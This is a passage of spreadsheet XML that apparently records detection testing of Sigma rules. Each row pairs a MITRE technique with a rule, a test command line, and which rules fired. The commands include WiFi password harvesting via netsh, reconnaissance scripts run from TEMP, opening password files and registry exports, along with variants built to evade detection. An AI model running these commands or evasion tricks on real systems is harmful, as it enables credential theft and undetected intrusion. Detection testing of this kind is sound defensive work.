        <v>1</v>
      </c>
      <c r="I1478" s="43" t="n"/>
      <c r="J1478" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1478" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1479" ht="15.75" customHeight="1" s="42">
      <c r="A1479" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1479" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1479" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1479" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1479" s="43" t="inlineStr">
        <is>
          <t>gpresult "/z"</t>
        </is>
      </c>
      <c r="F1479" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1479" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information (e56d3073-83ff-4021-90fe-c658e0709e72)</t>
        </is>
      </c>
      <c r="J1479" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1479" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1480" ht="15.75" customHeight="1" s="42">
      <c r="A1480" s="43" t="n"/>
      <c r="B1480" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C1480" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1480" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E1480" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F1480" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1480" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1480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1480" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1480" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1481" ht="15.75" customHeight="1" s="42">
      <c r="A1481" s="43" t="n"/>
      <c r="B1481" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C1481" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1481" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E1481" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F1481" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1481" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1481" s="4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1481" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1481" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1482" ht="15.75" customHeight="1" s="42">
      <c r="A1482" s="43" t="n"/>
      <c r="B1482" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C1482" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1482" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E1482" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F1482" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1482" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1482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1482" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1482" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1483" ht="15.75" customHeight="1" s="42">
      <c r="A1483" s="43" t="n"/>
      <c r="B1483" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C1483" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1483" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E1483" s="43" t="inlineStr">
        <is>
          <t>cscript.exe C:\Windows\System32\GATHER~1.VBS</t>
        </is>
      </c>
      <c r="F1483" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1483" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1483" s="43" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J1483" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1483" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1484" ht="15.75" customHeight="1" s="42">
      <c r="A1484" s="43" t="n"/>
      <c r="B1484" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C1484" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1484" s="43" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E1484" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\gni_recon.vbs &amp; cscript.exe %TEMP%\gni_recon.vbs</t>
        </is>
      </c>
      <c r="F1484" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1484" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS (07aa184a-870d-413d-893a-157f317f6f58); Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS (07aa184a-870d-413d-893a-157f317f6f58); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1484" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1484" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1485" ht="15.75" customHeight="1" s="42">
      <c r="A1485" s="43" t="n"/>
      <c r="B1485" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C1485" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D1485" s="43" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E1485" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\gni_recon.vbs &amp; cscript.exe %TEMP%\gni_recon.vbs</t>
        </is>
      </c>
      <c r="F1485" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1485" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS (07aa184a-870d-413d-893a-157f317f6f58); Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS (07aa184a-870d-413d-893a-157f317f6f58); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J1485" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1485" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1486" ht="15.75" customHeight="1" s="42">
      <c r="A1486" s="43" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1486" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1486" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1486" s="43" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1486" s="43" t="inlineStr">
        <is>
          <t>chcp</t>
        </is>
      </c>
      <c r="F1486" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1486" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1486" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1486" s="43" t="n"/>
      <c r="J1486" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1486" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1487" ht="15.75" customHeight="1" s="42">
      <c r="A1487" s="43" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1487" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1487" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1487" s="43" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1487" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "chcp"</t>
        </is>
      </c>
      <c r="F1487" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1487" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1487" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1487" s="43" t="n"/>
      <c r="J1487" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1487" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1488" ht="15.75" customHeight="1" s="42">
      <c r="A1488" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1488" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1488" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1488" s="43" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1488" s="43" t="inlineStr">
        <is>
          <t>reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation" /v TimeZoneKeyName</t>
        </is>
      </c>
      <c r="F1488" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1488" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1488" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1488" s="43" t="n"/>
      <c r="J1488" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1488" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1489" ht="15.75" customHeight="1" s="42">
      <c r="A1489" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1489" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1489" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1489" s="43" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1489" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell"}</t>
        </is>
      </c>
      <c r="F1489" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1489" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1489" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1489" s="43" t="n"/>
      <c r="J1489" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1489" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1490" ht="15.75" customHeight="1" s="42">
      <c r="A1490" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1490" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1490" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1490" s="43" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1490" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit"}</t>
        </is>
      </c>
      <c r="F1490" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1490" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1490" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1490" s="43" t="n"/>
      <c r="J1490" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1490" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1491" ht="15.75" customHeight="1" s="42">
      <c r="A1491" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1491" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1491" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1491" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1491" s="43" t="inlineStr">
        <is>
          <t>gpresult  /z</t>
        </is>
      </c>
      <c r="F1491" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1491" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1491" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1491" s="43" t="n"/>
      <c r="J1491" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1491" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1492" ht="15.75" customHeight="1" s="42">
      <c r="A1492" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B1492" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_packet_capture</t>
        </is>
      </c>
      <c r="C1492" s="43" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1492" s="43" t="inlineStr">
        <is>
          <t>d3c3861d-c504-4c77-ba55-224ba82d0118</t>
        </is>
      </c>
      <c r="E1492" s="43" t="inlineStr">
        <is>
          <t>netsh tr st capture=yes</t>
        </is>
      </c>
      <c r="F1492" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1492" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1492" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1492" s="43" t="n"/>
      <c r="J1492" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1492" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1493" ht="15.75" customHeight="1" s="42">
      <c r="A1493" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B1493" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C1493" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1493" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E1493" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo wlan s p k name=SSID key=clear | netsh.exe"</t>
        </is>
      </c>
      <c r="F1493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1493" s="43" t="n"/>
      <c r="J1493" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1493" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1494" ht="15.75" customHeight="1" s="42">
      <c r="A1494" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B1494" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C1494" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1494" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E1494" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo wlan show profile name=SSID key=clear | netsh.exe"</t>
        </is>
      </c>
      <c r="F1494" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1494" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1494" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1494" s="43" t="n"/>
      <c r="J1494" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1494" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1495" ht="15.75" customHeight="1" s="42">
      <c r="A1495" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B1495" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C1495" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1495" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E1495" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c echo wlan show profile name=SSID key=clear | netsh.exe</t>
        </is>
      </c>
      <c r="F1495" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1495" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1495" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1495" s="43" t="n"/>
      <c r="J1495" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1495" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1496" ht="15.75" customHeight="1" s="42">
      <c r="A1496" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1496" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1496" s="43" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1496" s="43" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1496" s="43" t="inlineStr">
        <is>
          <t>notepad.exe C:\Users\admin\Documents\passwords.txt</t>
        </is>
      </c>
      <c r="F1496" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1496" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1496" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1496" s="43" t="n"/>
      <c r="J1496" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1496" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1497" ht="15.75" customHeight="1" s="42">
      <c r="A1497" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1497" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1497" s="43" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1497" s="43" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1497" s="43" t="inlineStr">
        <is>
          <t>notepad.exe "C:\\Data\\passwords.csv"</t>
        </is>
      </c>
      <c r="F1497" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1497" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1497" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1497" s="43" t="n"/>
      <c r="J1497" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1497" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1498" ht="15.75" customHeight="1" s="42">
      <c r="A1498" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1498" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1498" s="43" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1498" s="43" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1498" s="43" t="inlineStr">
        <is>
          <t>notepad.exe C:\secure\passwords.bak</t>
        </is>
      </c>
      <c r="F1498" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1498" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1498" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1498" s="43" t="n"/>
      <c r="J1498" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1498" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1499" ht="15.75" customHeight="1" s="42">
      <c r="A1499" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1499" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1499" s="43" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1499" s="43" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1499" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "notepad C:\\backup\\passwords.log"</t>
        </is>
      </c>
      <c r="F1499" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1499" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1499" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1499" s="43" t="n"/>
      <c r="J1499" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1499" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1500" ht="15.75" customHeight="1" s="42">
      <c r="A1500" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1500" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1500" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1500" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1500" s="43" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg</t>
        </is>
      </c>
      <c r="F1500" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1500" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1500" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1500" s="43" t="n"/>
      <c r="J1500" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1500" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1501" ht="15.75" customHeight="1" s="42">
      <c r="A1501" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1501" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1501" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1501" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1501" s="43" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg /y</t>
        </is>
      </c>
      <c r="F1501" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1501" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1501" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1501" s="43" t="n"/>
      <c r="J1501" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1501" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1502" ht="15.75" customHeight="1" s="42">
      <c r="A1502" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1502" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1502" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1502" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1502" s="43" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg &gt; NUL</t>
        </is>
      </c>
      <c r="F1502" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1502" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1502" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1502" s="43" t="n"/>
      <c r="J1502" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1502" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1503" ht="15.75" customHeight="1" s="42">
      <c r="A1503" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1503" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1503" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1503" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1503" s="43" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg 2&gt;&amp;1 | findstr /v "error"</t>
        </is>
      </c>
      <c r="F1503" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1503" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1503" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1503" s="43" t="n"/>
      <c r="J1503" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1503" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1504" ht="15.75" customHeight="1" s="42">
      <c r="A1504" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1504" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1504" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1504" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E1504" s="43" t="inlineStr">
        <is>
          <t>set REG_PATH=HKCU\Software &amp;&amp; reg.exe export %REG_PATH% C:\temp\export.reg</t>
        </is>
      </c>
      <c r="F1504" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1504" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1504" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1504" s="43" t="n"/>
      <c r="J1504" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1504" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1505" ht="15.75" customHeight="1" s="42">
      <c r="A1505" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1505" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C1505" s="43" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D1505" s="43" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
